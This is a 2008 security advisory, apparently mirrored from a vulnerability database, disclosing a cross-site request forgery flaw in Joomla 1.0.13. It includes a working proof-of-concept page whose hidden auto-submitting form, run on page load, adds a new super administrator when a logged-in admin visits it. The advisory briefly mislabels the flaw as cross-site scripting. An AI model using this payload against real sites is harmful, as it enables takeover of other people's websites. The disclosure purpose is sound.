Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18825
HistoryJan 09, 2008 - 12:00 a.m.

Joomla 1.0.13 CSRF

2008-01-0900:00:00
vulners.com
29

Author: Jose Carlos Nieto.

Date: Jan 08, 2008

Severity: Mild

There exists a Cross Site Scripting security hole in Joomla 1.0.13.

Background

Joomla! is a free <http://en.wikipedia.org/wiki/Free_software&gt;, open source <http://en.wikipedia.org/wiki/Open_source_software&gt; content management system <http://en.wikipedia.org/wiki/Content_management_system&gt; for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web&gt; and intranets <http://en.wikipedia.org/wiki/Intranet&gt;.
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License&gt;, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_&#37;28software_development&#37;29&gt; of Mambo <http://en.wikipedia.org/wiki/Mambo_&#37;28CMS&#37;29&gt;.

Severity

Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.

Summary

Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing
a specially crafted webpage containing an exploit, this exploit can execute (without permission)
any command the administrator would normally execute, such as publish a content or even add a new
administrator.

Solution

This problem has no solution at this time.

Disclosure timeline

Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.

Proof of Concept

If a logged in administrator visits this page a new administrator will be added to the victim's
Joomla powered website.

---- exploit code ----

<script type="text/javascript">

window.onload = function() {

var url = &quot;http://joomlasite.com/joomla/administrator/index2.php&quot;;


var gid = 25;

var user = &#39;custom_username&#39;;

var pass = &#39;custom_password&#39;;

var email = &#39;[email protected]&#39;;

var param = {

    name: user,

    username: user,

    email: email,

    password: pass,

    password2: pass,

    gid: gid,

    block: 0,

    option: &#39;com_users&#39;,

    task: &#39;save&#39;,

    sendEmail: 1

};


var form = document.createElement&#40;&#39;form&#39;&#41;;

form.action = url;

form.method = &#39;post&#39;;

form.target = &#39;hidden&#39;;

form.style.display = &#39;none&#39;;


for &#40;var i in param&#41; {

    try {

        // ie

        var input = document.createElement&#40;&#39;&lt;input name=&quot;&#39;+i+&#39;&quot;&gt;&#39;&#41;;

    } catch&#40;e&#41; {

        // other browsers

        var input = document.createElement&#40;&#39;input&#39;&#41;;

        input.name = i;

    }

    input.setAttribute&#40;&#39;value&#39;,  param[i]&#41;;

    form.appendChild&#40;input&#41;;

}

document.body.appendChild&#40;form&#41;;


form.submit&#40;&#41;;

}

</script>

<iframe name="hidden" style="display: none"></iframe>

<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg&quot;&gt;

---- exploit code ----